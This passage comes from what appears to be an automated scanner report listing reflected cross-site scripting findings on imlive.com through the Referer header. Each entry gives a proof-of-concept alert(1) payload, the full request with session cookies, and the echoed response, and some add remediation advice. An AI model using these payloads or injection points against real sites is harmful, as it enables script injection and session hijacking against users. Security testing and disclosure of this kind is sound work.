Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:52 GMT
Connection: close
Content-Length: 9919
Vary: Accept-Encoding


<!--include file="help/CustomerServiceEmails.inc"-->

<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/pr.asp&lr=1107816009&ud=0&pe=pr.asp&rf=http://www.google.com/search?hl=en^q=fa9af'><script>alert(1)</script>4ba405bce21&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.986. http://imlive.com/preparesearch.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 198f8'-alert(1)-'996d2f33bb5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=198f8'-alert(1)-'996d2f33bb5

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:14:07 GMT
Connection: close
Content-Length: 18926
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx&rf=http://www.google.com/search?hl=en^q=198f8'-alert(1)-'996d2f33bb5&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.987. http://imlive.com/preparesearch.aspx [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /preparesearch.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18795'-alert(1)-'f742b451262 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /preparesearch.aspx HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=18795'-alert(1)-'f742b451262

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:02 GMT
Connection: close
Content-Length: 18928
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx&rf=http://www.google.com/search?hl=en^q=18795'-alert(1)-'f742b451262&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.988. http://imlive.com/search.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /search.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9024'-alert(1)-'8f7cf0979cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b9024'-alert(1)-'8f7cf0979cd

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0Qsll365UE8reLCPGZg%2bpu0PxjgT8zCCP45rr2S04rqh; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:35 GMT
Connection: close
Content-Length: 74452
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/&rf=http://www.google.com/search?hl=en^q=b9024'-alert(1)-'8f7cf0979cd&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.989. http://imlive.com/sitemap.html [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /sitemap.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e210'><script>alert(1)</script>f3991d075f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sitemap.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=4e210'><script>alert(1)</script>f3991d075f5

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:11 GMT
Connection: close
Content-Length: 33816
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html&lr=1107816008&ud=0&pe=sitemap.asp&rf=http://www.google.com/search?hl=en^q=4e210'><script>alert(1)</script>f3991d075f5&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.990. http://imlive.com/videosfr.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /videosfr.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 111ed'><script>alert(1)</script>4d6efbd9952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /videosfr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=111ed'><script>alert(1)</script>4d6efbd9952

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:47 GMT
Connection: close
Content-Length: 15789
Vary: Accept-Encoding


<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp&lr=1107816009&ud=0&pe=videosfr.asp&rf=http://www.google.com/search?hl=en^q=111ed'><script>alert(1)</script>4d6efbd9952&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.991. http://imlive.com/warningms.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff88f'><script>alert(1)</script>7d0fb5f5c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /warningms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ff88f'><script>alert(1)</script>7d0fb5f5c2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 14501
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp&lr=1107816008&ud=0&pe=warningms.asp&rf=http://www.google.com/search?hl=en^q=ff88f'><script>alert(1)</script>7d0fb5f5c2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.992. http://imlive.com/webcam-advanced-search/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad308'-alert(1)-'2250bef2d23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-advanced-search/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ad308'-alert(1)-'2250bef2d23

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:58 GMT
Connection: close
Content-Length: 74454
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/&rf=http://www.google.com/search?hl=en^q=ad308'-alert(1)-'2250bef2d23&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.993. http://imlive.com/webcam-faq/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fad7'-alert(1)-'8afcbd3f2d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-faq/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=2fad7'-alert(1)-'8afcbd3f2d9

Response

HTTP/1.1 200 OK
Cache-Control: private
